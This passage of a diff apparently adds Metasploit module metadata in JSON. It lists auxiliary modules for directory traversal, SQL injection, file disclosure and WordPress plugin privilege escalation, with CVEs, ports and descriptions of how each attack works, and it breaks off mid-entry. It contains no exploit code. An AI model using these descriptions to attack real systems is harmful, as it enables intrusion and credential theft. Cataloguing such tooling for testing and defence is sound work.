Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0\n - 6.0.16 under specific and non-default installations. The connector must have\n allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the\n vulnerability actually occurs within Java and not Tomcat; the server must\n use Java versions prior to Sun 1.4.2_19, 1.5.0_17, 6u11 - or prior IBM Java\n 5.0 SR9, 1.4.2 SR13, SE 6 SR4 releases. This module has only been tested against\n RedHat 9 running Tomcat 6.0.16 and Sun JRE 1.5.0-05. You may wish to change\n FILE (hosts,sensitive files), MAXDIRS and RPORT depending on your environment.", + "references": [ + "URL-http://tomcat.apache.org/", + "OSVDB-47464", + "CVE-2008-2938", + "URL-http://www.securityfocus.com/archive/1/499926" + ], + "platform": "", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb", + "is_install_path": true, + "ref_name": "admin/http/tomcat_utf8_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/trendmicro_dlp_traversal": { + "name": "TrendMicro Data Loss Prevention 5.5 Directory Traversal", + "fullname": "auxiliary/admin/http/trendmicro_dlp_traversal", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-09", + "type": "auxiliary", + "author": [ + "aushack " + ], + "description": "This module tests whether a directory traversal vulnerability is present\n in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.\n The vulnerability appears to be actually caused by the Tomcat UTF-8\n bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.\n This module simply tests for the same bug with Trend Micro 
specific settings.\n Note that in the Trend Micro appliance, /etc/shadow is not used and therefore\n password hashes are stored and anonymously accessible in the passwd file.", + "references": [ + "URL-http://tomcat.apache.org/", + "OSVDB-47464", + "OSVDB-73447", + "CVE-2008-2938", + "URL-http://www.securityfocus.com/archive/1/499926", + "EDB-17388", + "BID-48225" + ], + "platform": "", + "arch": "", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb", + "is_install_path": true, + "ref_name": "admin/http/trendmicro_dlp_traversal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/typo3_news_module_sqli": { + "name": "TYPO3 News Module SQL Injection", + "fullname": "auxiliary/admin/http/typo3_news_module_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-04-06", + "type": "auxiliary", + "author": [ + "Marco Rivoli", + "Charles Fol" + ], + "description": "This module exploits a SQL Injection vulnerability In TYPO3 NewsController.php\n in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n can be used to obtain password hashes for application user accounts. This module has been\n tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n This module tries to extract username and password hash of the administrator user.\n It tries to inject sql and check every letter of a pattern, to see\n if it belongs to the username or password it tries to alter the ordering of results. 
If\n the letter doesn't belong to the word being extracted then all results are inverted\n (News #2 appears before News #1, so Pattern2 before Pattern1), instead if the letter belongs\n to the word being extracted then the results are in proper order (News #1 appears before News #2,\n so Pattern1 before Pattern2)", + "references": [ + "CVE-2017-7581", + "URL-http://www.ambionics.io/blog/typo3-news-module-sqli" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_news_module_sqli", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/typo3_sa_2009_001": { + "name": "TYPO3 sa-2009-001 Weak Encryption Key File Disclosure", + "fullname": "auxiliary/admin/http/typo3_sa_2009_001", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-01-20", + "type": "auxiliary", + "author": [ + "Chris John Riley" + ], + "description": "This module exploits a flaw in TYPO3 encryption ey creation process to allow for\n file disclosure in the jumpUrl mechanism. 
This flaw can be used to read any file\n that the web server user account has access to view.", + "references": [ + "CVE-2009-0255", + "OSVDB-51536", + "URL-http://blog.c22.cc/advisories/typo3-sa-2009-001", + "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_sa_2009_001", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/typo3_sa_2009_002": { + "name": "Typo3 sa-2009-002 File Disclosure", + "fullname": "auxiliary/admin/http/typo3_sa_2009_002", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-02-10", + "type": "auxiliary", + "author": [ + "spinbad " + ], + "description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. 
This flaw can be used to read any file that the web server user account has\n access to.", + "references": [ + "OSVDB-52048", + "CVE-2009-0815", + "URL-http://web.archive.org/web/20090212165636/http://secunia.com:80/advisories/33829/", + "EDB-8038", + "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_sa_2009_002", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "Download", + "description": "Download arbitrary file" + } + ] + }, + "auxiliary_admin/http/typo3_sa_2010_020": { + "name": "TYPO3 sa-2010-020 Remote File Disclosure", + "fullname": "auxiliary/admin/http/typo3_sa_2010_020", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Chris John Riley", + "Gregor Kopf" + ], + "description": "This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.\n Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.\n This flaw can be used to read any file that the web server user account has access to view.", + "references": [ + "CVE-2010-3714", + "URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020", + "URL-http://web.archive.org/web/20180126053019/http://gregorkopf.de/slides_berlinsides_2010.pdf" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2025-02-07 
12:36:11 +0000", + "path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_sa_2010_020", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/typo3_winstaller_default_enc_keys": { + "name": "TYPO3 Winstaller Default Encryption Keys", + "fullname": "auxiliary/admin/http/typo3_winstaller_default_enc_keys", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Chris John Riley" + ], + "description": "This module exploits known default encryption keys found in the TYPO3 Winstaller.\n This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be\n used to read any file that the web server user account has access to view.\n\n The method used to create the juhash (short MD5 hash) was altered in later versions\n of Typo3. Use the show actions command to display and select the version of TYPO3 in\n use (defaults to the older method of juhash creation).", + "references": [ + "URL-http://typo3winstaller.sourceforge.net/" + ], + "platform": "", + "arch": "", + "rport": 8503, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb", + "is_install_path": true, + "ref_name": "admin/http/typo3_winstaller_default_enc_keys", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [ + { + "name": "HMAC_SHA1", + "description": "TYPO3 4.2.15 (or later), 4.3.7 (or later), 4.4.4 (or later), 4.5.0 (or later)" + }, + { + "name": "MIME", + "description": "TYPO3 4.1.14 (or later), 4.2.13 - 4.2.14, 4.3.4 - 4.3.6, or 
4.4.1 - 4.4.3" + }, + { + "name": "Short_MD5", + "description": "TYPO3 4.1.13 (or earlier), 4.2.12 (or earlier), 4.3.3 (or earlier), or 4.4.0" + } + ] + }, + "auxiliary_admin/http/ulterius_file_download": { + "name": "Ulterius Server File Download Vulnerability", + "fullname": "auxiliary/admin/http/ulterius_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Rick Osgood", + "Jacob Robles" + ], + "description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.", + "references": [ + "EDB-43141", + "CVE-2017-16806" + ], + "platform": "", + "arch": "", + "rport": 22006, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/ulterius_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/ulterius_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/vbulletin_upgrade_admin": { + "name": "vBulletin Administrator Account Creation", + "fullname": "auxiliary/admin/http/vbulletin_upgrade_admin", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-10-09", + "type": "auxiliary", + "author": [ + "Unknown", + "juan vazquez " + ], + "description": "This module abuses the \"install/upgrade.php\" component on vBulletin 4.1+ and 4.5+ to\n create a new 
administrator account, as exploited in the wild on October 2013. This module\n has been tested successfully on vBulletin 4.1.5 and 4.1.0.", + "references": [ + "CVE-2013-6129", + "URL-http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html", + "OSVDB-98370", + "URL-http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb", + "is_install_path": true, + "ref_name": "admin/http/vbulletin_upgrade_admin", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/webnms_cred_disclosure": { + "name": "WebNMS Framework Server Credential Disclosure", + "fullname": "auxiliary/admin/http/webnms_cred_disclosure", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-07-04", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\n all user credentials. The first vulnerability is an unauthenticated file download\n in the FetchFile servlet, which is used to download the file containing the user\n credentials. 
The second vulnerability is that the passwords in the file are\n obfuscated with a very weak algorithm which can be easily reversed.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.", + "references": [ + "CVE-2016-6601", + "CVE-2016-6602", + "URL-https://blogs.securiteam.com/index.php/archives/2712", + "URL-https://seclists.org/fulldisclosure/2016/Aug/54" + ], + "platform": "", + "arch": "", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb", + "is_install_path": true, + "ref_name": "admin/http/webnms_cred_disclosure", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/webnms_file_download": { + "name": "WebNMS Framework Server Arbitrary Text File Download", + "fullname": "auxiliary/admin/http/webnms_file_download", + "aliases": [], + "rank": 300, + "disclosure_date": "2016-07-04", + "type": "auxiliary", + "author": [ + "Pedro Ribeiro " + ], + "description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\n unauthenticated user to download files off the file system by using a directory\n traversal attack on the FetchFile servlet.\n Note that only text files can be downloaded properly, as any binary file will get\n mangled by the servlet. 
Also note that for Windows targets you can only download\n files that are in the same drive as the WebNMS installation.\n This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\n Windows and Linux.", + "references": [ + "CVE-2016-6601", + "URL-https://blogs.securiteam.com/index.php/archives/2712", + "URL-https://seclists.org/fulldisclosure/2016/Aug/54" + ], + "platform": "", + "arch": "", + "rport": 9090, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/webnms_file_download.rb", + "is_install_path": true, + "ref_name": "admin/http/webnms_file_download", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/whatsup_gold_sqli": { + "name": "WhatsUp Gold SQL Injection (CVE-2024-6670)", + "fullname": "auxiliary/admin/http/whatsup_gold_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-08-29", + "type": "auxiliary", + "author": [ + "Michael Heinzl", + "Sina Kheirkhah ( " + ], + "description": "This module exploits a SQL injection vulnerability in WhatsUp Gold, by changing the password of an existing user (such as of the default admin account)\n to an attacker-controlled one.\n\n WhatsUp Gold versions < v24.0.0 are affected.", + "references": [ + "CVE-2024-6670", + "URL-https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024", + "URL-https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-1185/" + ], + "platform": "", + "arch": "", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": 
null, + "mod_time": "2024-09-26 04:01:36 +0000", + "path": "/modules/auxiliary/admin/http/whatsup_gold_sqli.rb", + "is_install_path": true, + "ref_name": "admin/http/whatsup_gold_sqli", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_automatic_plugin_privesc": { + "name": "WordPress Plugin Automatic Config Change to RCE", + "fullname": "auxiliary/admin/http/wp_automatic_plugin_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-09-06", + "type": "auxiliary", + "author": [ + "h00die", + "Jerome Bruandet" + ], + "description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n address will be changed. User registration is\n enabled, and default user role is set to administrator. A user is then created with\n the USER name set. 
A valid EMAIL is required to get the registration email (not handled in MSF).", + "references": [ + "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/" + ], + "platform": "PHP", + "arch": "php", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-03 19:50:04 +0000", + "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_automatic_plugin_privesc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes", + "ioc-in-logs" + ], + "NOCVE": [ + "Patched in 3.53.3 without vendor disclosure" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_custom_contact_forms": { + "name": "WordPress custom-contact-forms Plugin SQL Upload", + "fullname": "auxiliary/admin/http/wp_custom_contact_forms", + "aliases": [], + "rank": 300, + "disclosure_date": "2014-08-07", + "type": "auxiliary", + "author": [ + "Marc-Alexandre Montpas", + "Christian Mehlmauer " + ], + "description": "The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download\n a SQL dump of the plugins database tables. It's also possible to upload files containing\n SQL statements which will be executed. 
The module first tries to extract the WordPress\n table prefix from the dump and then attempts to create a new admin user.", + "references": [ + "URL-http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html", + "URL-https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=", + "WPVDB-7542" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_custom_contact_forms", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_easycart_privilege_escalation": { + "name": "WordPress WP EasyCart Plugin Privilege Escalation", + "fullname": "auxiliary/admin/http/wp_easycart_privilege_escalation", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-02-25", + "type": "auxiliary", + "author": [ + "rastating" + ], + "description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. 
This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.", + "references": [ + "CVE-2015-2673", + "WPVDB-7808", + "URL-https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_easycart_privilege_escalation", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_gdpr_compliance_privesc": { + "name": "WordPress WP GDPR Compliance Plugin Privilege Escalation", + "fullname": "auxiliary/admin/http/wp_gdpr_compliance_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-11-08", + "type": "auxiliary", + "author": [ + "Mikey Veenstra (WordFence)", + "Thomas Labadie" + ], + "description": "The Wordpress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n wordpress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPress’s admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets Wordpress configuration options without reading their current\n values and restoring them later.", + "references": [ + "URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/", + "CVE-2018-19207", + "WPVDB-9144" + ], + "platform": "", + 
"arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_gdpr_compliance_privesc", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_google_maps_sqli": { + "name": "WordPress Google Maps Plugin SQL Injection", + "fullname": "auxiliary/admin/http/wp_google_maps_sqli", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-04-02", + "type": "auxiliary", + "author": [ + "Thomas Chauchefoin (Synacktiv)" + ], + "description": "This module exploits a SQL injection vulnerability in a REST endpoint\n registered by the WordPress plugin wp-google-maps between 7.11.00 and\n 7.11.17 (included).\n\n As the table prefix can be changed by administrators, set DB_PREFIX\n accordingly.", + "references": [ + "CVE-2019-10692", + "WPVDB-9249" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_google_maps_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_masterstudy_privesc": { + "name": "Wordpress MasterStudy Admin Account Creation", + "fullname": "auxiliary/admin/http/wp_masterstudy_privesc", + 
"aliases": [], + "rank": 300, + "disclosure_date": "2022-02-18", + "type": "auxiliary", + "author": [ + "h00die", + "Numan Türle" + ], + "description": "MasterStudy LMS, a WordPress plugin,\n prior to 2.7.6 is affected by a privilege escalation where an unauthenticated\n user is able to create an administrator account for wordpress itself.", + "references": [ + "CVE-2022-0441", + "URL-https://gist.github.com/numanturle/4762b497d3b56f1a399ea69aa02522a6", + "EDB-50752", + "WPVDB-173c2efe-ee9c-4539-852f-c242b4f728ed" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2022-10-13 10:13:27 +0000", + "path": "/modules/auxiliary/admin/http/wp_masterstudy_privesc.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_masterstudy_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_post_smtp_acct_takeover": { + "name": "Wordpress POST SMTP Account Takeover", + "fullname": "auxiliary/admin/http/wp_post_smtp_acct_takeover", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-01-10", + "type": "auxiliary", + "author": [ + "h00die", + "Ulysses Saicha" + ], + "description": "The POST SMTP WordPress plugin prior to 2.8.7 is affected by a privilege\n escalation where an unauthenticated user is able to reset the password\n of an arbitrary user. 
This is done by requesting a password reset, then\n viewing the latest email logs to find the associated password reset email.", + "references": [ + "CVE-2023-6875", + "URL-https://github.com/UlyssesSaicha/CVE-2023-6875/tree/main" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-11-28 13:18:47 +0000", + "path": "/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_post_smtp_acct_takeover", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_symposium_sql_injection": { + "name": "WordPress Symposium Plugin SQL Injection", + "fullname": "auxiliary/admin/http/wp_symposium_sql_injection", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-08-18", + "type": "auxiliary", + "author": [ + "PizzaHatHacker", + "Matteo Cantoni " + ], + "description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n before 15.8 for WordPress, which allows remote attackers to extract credentials\n via the size parameter to get_album_item.php.", + "references": [ + "CVE-2015-6522", + "EDB-37824" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2024-01-07 15:02:53 +0000", + "path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_symposium_sql_injection", + "check": true, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/wp_wplms_privilege_escalation": { + "name": "WordPress WPLMS Theme Privilege Escalation", + "fullname": "auxiliary/admin/http/wp_wplms_privilege_escalation", + "aliases": [], + "rank": 300, + "disclosure_date": "2015-02-09", + "type": "auxiliary", + "author": [ + "Evex", + "rastating" + ], + "description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.", + "references": [ + "WPVDB-7785" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb", + "is_install_path": true, + "ref_name": "admin/http/wp_wplms_privilege_escalation", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/http/zyxel_admin_password_extractor": { + "name": "ZyXEL GS1510-16 Password Extractor", + "fullname": "auxiliary/admin/http/zyxel_admin_password_extractor", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Daniel Manser", + "Sven Vetsch" + ], + "description": "This module 
exploits a vulnerability in ZyXEL GS1510-16 routers\n to extract the admin password. Due to a lack of authentication on the\n webctrl.cgi script, unauthenticated attackers can recover the\n administrator password for these devices. The vulnerable device\n has reached end of life for support from the manufacturer, so it is\n unlikely this problem will be addressed.", + "references": [ + "URL-https://github.com/rapid7/metasploit-framework/pull/2709" + ], + "platform": "", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": null, + "mod_time": "2023-02-08 14:30:08 +0000", + "path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb", + "is_install_path": true, + "ref_name": "admin/http/zyxel_admin_password_extractor", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "actions": [] + }, + "auxiliary_admin/kerberos/forge_ticket": { + "name": "Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging", + "fullname": "auxiliary/admin/kerberos/forge_ticket", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "auxiliary", + "author": [ + "Benjamin 